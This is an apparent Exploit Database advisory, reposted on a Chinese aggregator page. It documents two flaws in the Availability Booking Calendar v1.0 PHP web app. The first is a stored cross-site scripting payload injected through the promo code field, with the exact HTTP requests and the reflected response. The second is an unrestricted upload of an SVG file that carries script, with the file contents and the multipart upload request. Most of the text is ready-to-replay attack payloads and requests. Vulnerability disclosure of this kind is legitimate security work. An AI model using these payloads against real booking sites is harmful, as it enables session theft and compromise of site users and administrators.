Availability Booking Calendar v1.0 – Multiple Cross-site scripting (XSS)

• Exploit Database
• 17 阅读

• 作者： Andrey Stoykov
  日期： 2023-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51626/

• # Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
  # Date: 07/2023
  # Exploit Author: Andrey Stoykov
  # Tested on: Ubuntu 20.04
  # Blog: http://msecureltd.blogspot.com
  
  
  XSS #1:
  
  Steps to Reproduce:
  
  1. Browse to Bookings
  2. Select All Bookings
  3. Edit booking and select Promo Code
  4. Enter payload TEST"><script>alert(`XSS`)</script>
  
  
  // HTTP POST request
  
  POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
  Host: hostname
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
  [...]
  
  [...]
  edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
  [...]
  
  // HTTP response
  
  HTTP/1.1 200 OK
  Content-Type: text/html; charset=utf-8
  Content-Length: 205
  [...]
  
  
  
  // HTTP GET request to Bookings page
  
  GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
  Host: hostname
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
  [...]
  
  
  // HTTP response
  
  HTTP/1.1 200 OK
  Content-Type: text/html; charset=utf-8
  Content-Length: 33590
  [...]
  
  [...]
  <label class="control-label" for="promo_code">Promo code:</label>
  <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
  </div>
  [...]
  
  
  
  Unrestricted File Upload #1:
  
  
  // SVG file contents
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
  alert(`XSS`);
   </script>
  </svg>
  
  
  Steps to Reproduce:
  
  1. Browse My Account
  2. Image Browse -> Upload
  3. Then right click on image
  4. Select Open Image in New Tab
  
  
  // HTTP POST request
  
  POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
  Host: hostname
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
  [...]
  
  [...]
  -----------------------------13831219578609189241212424546
  Content-Disposition: form-data; name="img"; filename="xss.svg"
  Content-Type: image/svg+xml
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
  alert(`XSS`);
   </script>
  </svg>
  [...]
  
  
  // HTTP response
  
  HTTP/1.1 200 OK
  Content-Type: text/html; charset=utf-8
  Content-Length: 190
  [...]